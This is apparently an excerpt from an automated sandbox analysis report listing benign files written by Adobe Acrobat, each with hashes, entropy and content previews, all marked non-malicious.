                                                                                                    Preview:2024/11/12-08:30:11.151 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-08:30:11.153 1c9c Recovering log #3.2024/11/12-08:30:11.153 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):336
                                                                                                    Entropy (8bit):5.174347294685818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UVUh9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8YU4UZnhJZmw+YU4U9sN9VkwOwknV:l4vYfHAa8uFUt8VhJ/+JsND5JfHAa8RJ
                                                                                                    MD5:B45C2A0186F039DBFE37D2DB526353B0
                                                                                                    SHA1:6B43BD8FBD5C21E2BA8055E4D9819C7B70004379
                                                                                                    SHA-256:278B671F850EA26BC8B9FDA741976CEB18AEB51EED20A129C52D63555393D82B
                                                                                                    SHA-512:0BB2A880DD0363F36661837C88B31BB3A56B3518E755AA7CBB61BFA99B95646CDD14ECE70F5C74A3365C51A2060C322E09391EFDD75045C29A2FD746C64BEBD5
                                                                                                    Malicious:false
                                                                                                    Preview:2024/11/12-08:30:11.363 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-08:30:11.423 1db8 Recovering log #3.2024/11/12-08:30:11.556 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):336
                                                                                                    Entropy (8bit):5.174347294685818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UVUh9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8YU4UZnhJZmw+YU4U9sN9VkwOwknV:l4vYfHAa8uFUt8VhJ/+JsND5JfHAa8RJ
                                                                                                    MD5:B45C2A0186F039DBFE37D2DB526353B0
                                                                                                    SHA1:6B43BD8FBD5C21E2BA8055E4D9819C7B70004379
                                                                                                    SHA-256:278B671F850EA26BC8B9FDA741976CEB18AEB51EED20A129C52D63555393D82B
                                                                                                    SHA-512:0BB2A880DD0363F36661837C88B31BB3A56B3518E755AA7CBB61BFA99B95646CDD14ECE70F5C74A3365C51A2060C322E09391EFDD75045C29A2FD746C64BEBD5
                                                                                                    Malicious:false
                                                                                                    Preview:2024/11/12-08:30:11.363 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-08:30:11.423 1db8 Recovering log #3.2024/11/12-08:30:11.556 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:modified
                                                                                                    Size (bytes):475
                                                                                                    Entropy (8bit):4.973516851796719
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:YH/um3RA8sqSxksBdOg2HEZcaq3QYiubInP7E4T3y:Y2sRdsHJdMH13QYhbG7nby
                                                                                                    MD5:CBE58131C283614C2CE0453C8D0F962A
                                                                                                    SHA1:35B5357F70597B405C317D518296695E025E022A
                                                                                                    SHA-256:7FEAA8C770189463CAA779849A942B88B3D59C0F144E69727F384104A7BF0511
                                                                                                    SHA-512:844183714D54DE6AD173182042571730B927F8F998496F9F7D53F1EF08CC77AE087ADE1DC65C3FD07403220B1E6A04D629E4FE04FB9654DE28FCAF6036B8B322
                                                                                                    Malicious:false
                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375978217715160","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":241270},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):475
                                                                                                    Entropy (8bit):4.973516851796719
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:YH/um3RA8sqSxksBdOg2HEZcaq3QYiubInP7E4T3y:Y2sRdsHJdMH13QYhbG7nby
                                                                                                    MD5:CBE58131C283614C2CE0453C8D0F962A
                                                                                                    SHA1:35B5357F70597B405C317D518296695E025E022A
                                                                                                    SHA-256:7FEAA8C770189463CAA779849A942B88B3D59C0F144E69727F384104A7BF0511
                                                                                                    SHA-512:844183714D54DE6AD173182042571730B927F8F998496F9F7D53F1EF08CC77AE087ADE1DC65C3FD07403220B1E6A04D629E4FE04FB9654DE28FCAF6036B8B322
                                                                                                    Malicious:false
                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375978217715160","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":241270},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4320
                                                                                                    Entropy (8bit):5.257401205349519
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7VK7:etJCV4FiN/jTN/2r8Mta02fEhgO73goy
                                                                                                    MD5:B747B302B07FD4921539B23D310B3709
                                                                                                    SHA1:0E3B967622F09527B253F951C8F94EC824E03E87
                                                                                                    SHA-256:A44B0F98AD4DD2796555A76DFE7533F004FD59052B73DA4720EED5F5CFAF2FF3
                                                                                                    SHA-512:9DAA33E9F1588E730F17983A20CF7189663DE78DEB4EDA792A6763D3AE141A48CB54B300CDDE10EB1E777CD5A4C03A5DAD1E72E0DC3A7BDF44CC563530282BA4
                                                                                                    Malicious:false
                                                                                                    Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):5.187023639308432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UyE9+q2Pwkn2nKuAl9OmbzNMxIFUt8YU4UyZJZmw+YU4UyH9VkwOwkn2nKuAo:A4vYfHAa8jFUt8GJ/+8D5JfHAa84J
                                                                                                    MD5:DC6FBBF93979FC997FD4C6B5E784A267
                                                                                                    SHA1:A33EEB41189B7D5D984A087AD516A772C28D6043
                                                                                                    SHA-256:EE548A2CAC53D9D364C0DD77AA58123B7E74E01E8D06DF78F65AE46C4BA602CE
                                                                                                    SHA-512:11B5DE068A96CD50C5C65D22E085E32478CA9508B43A7EBA9CD7C26814F44152A998B4A5C5F57AF795D45EF24901CE66C1F422716C8CCF6CE22D6CB34950F0DE
                                                                                                    Malicious:false
                                                                                                    Preview:2024/11/12-08:30:12.064 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-08:30:12.067 1db8 Recovering log #3.2024/11/12-08:30:12.069 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):5.187023639308432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UyE9+q2Pwkn2nKuAl9OmbzNMxIFUt8YU4UyZJZmw+YU4UyH9VkwOwkn2nKuAo:A4vYfHAa8jFUt8GJ/+8D5JfHAa84J
                                                                                                    MD5:DC6FBBF93979FC997FD4C6B5E784A267
                                                                                                    SHA1:A33EEB41189B7D5D984A087AD516A772C28D6043
                                                                                                    SHA-256:EE548A2CAC53D9D364C0DD77AA58123B7E74E01E8D06DF78F65AE46C4BA602CE
                                                                                                    SHA-512:11B5DE068A96CD50C5C65D22E085E32478CA9508B43A7EBA9CD7C26814F44152A998B4A5C5F57AF795D45EF24901CE66C1F422716C8CCF6CE22D6CB34950F0DE
                                                                                                    Malicious:false
                                                                                                    Preview:2024/11/12-08:30:12.064 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-08:30:12.067 1db8 Recovering log #3.2024/11/12-08:30:12.069 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86016
                                                                                                    Entropy (8bit):4.444613540745923
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SeNci5tfiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:pUs3OazzU89UTTgUL
                                                                                                    MD5:39BE5079FA399AECAB22B8A32E62DD92
                                                                                                    SHA1:82635B3180459FC45D29C21FF5D528179735147C
                                                                                                    SHA-256:C673379DC9B08A59675801EC691251EE4B2A828C1602374F67EEEE106389A7E1
                                                                                                    SHA-512:562F4169FBDBFEB66D133C704349D84567F98753D71962C9F3C91E3033218C5A0EB1A706AF7C638DD0F797B44F138DE629ADE748CA6C0D4E38D3E022400E399A
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite Rollback Journal
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8720
                                                                                                    Entropy (8bit):2.212318389781437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7+tYF2nuwKtxqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfl:7MnnCtxqvmFTIF3XmHjBoGGR+jMz+Lhd
                                                                                                    MD5:EEC0C33DF0770752D4AABF5EB9FDEFA5
                                                                                                    SHA1:92D0E0FA351E3C85137357F39FE32AE4A70C8A27
                                                                                                    SHA-256:1928A0005ABCED80B1EC37A786B30CA57947678C5B73CD84978A22A105ECF03F
                                                                                                    SHA-512:465600E80F90E63B828895D73693DBA6EAF7C73F756C06EE67D66BBEBD20DA65E53084659507508EC15C94E0DA8E4FE0F884C86BACD8E0DD34DC027E3457F55E
                                                                                                    Malicious:false
                                                                                                    Preview:.... .c.....SL..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:Certificate, Version=3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1391
                                                                                                    Entropy (8bit):7.705940075877404
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                    Malicious:false
                                                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71954
                                                                                                    Entropy (8bit):7.996617769952133
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                    Malicious:false
                                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):192
                                                                                                    Entropy (8bit):2.7425532007658724
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:kkFkluTPtfllXlE/HT8kNzttNNX8RolJuRdxLlGB9lQRYwpDdt:kK3LeT8izVNMa8RdWBwRd
                                                                                                    MD5:B07E2C2DB906040893A19B7BD309BC93
                                                                                                    SHA1:354A40D78263C2836559760E8E8BCCAF2EB33695
                                                                                                    SHA-256:D43D4F4508EBE257F381EC90D6EDBAB9D9289A6CDF8130AB846DF14A7E62D5E9
                                                                                                    SHA-512:B7753F8F9E43C50247C394E0E55E32563C4D30F3B8C7E13D9BDBFB08429E76333ABA12FA98F18999333A81CA8B18EA6BC3590EEAC1FD2B0E983CCE73094C1D1F
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .........1;..5..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):328
                                                                                                    Entropy (8bit):3.2368928658074476
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKRllL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:RiDImsLNkPlE99SNxAhUe/3
                                                                                                    MD5:F4D0BBB13D9B6E54369212C6D2791FC1
                                                                                                    SHA1:831B62AF3AB1742018E4454350CEC8310EF5EE76
                                                                                                    SHA-256:E6C459456C43172129F11BF4FF733341D7C6461BCD9ACE01EA42028EF947A91A
                                                                                                    SHA-512:A0AB8F5B63C5B2F6DE98DBB67142E2436004EE5AD2AB4CFE478ADFAB3364180A7969E605342875EED56B17BE63BD3A530562E60FB6B0AF0D68F50ED29928BD7D
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ........,c...5..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PostScript document text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1233
                                                                                                    Entropy (8bit):5.233980037532449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                    Malicious:false
                                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PostScript document text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1233
                                                                                                    Entropy (8bit):5.233980037532449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                    Malicious:false
                                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PostScript document text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1233
                                                                                                    Entropy (8bit):5.233980037532449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                    Malicious:false
                                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PostScript document text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10880
                                                                                                    Entropy (8bit):5.214360287289079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                    Malicious:false
                                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PostScript document text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10880
                                                                                                    Entropy (8bit):5.214360287289079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                    Malicious:false
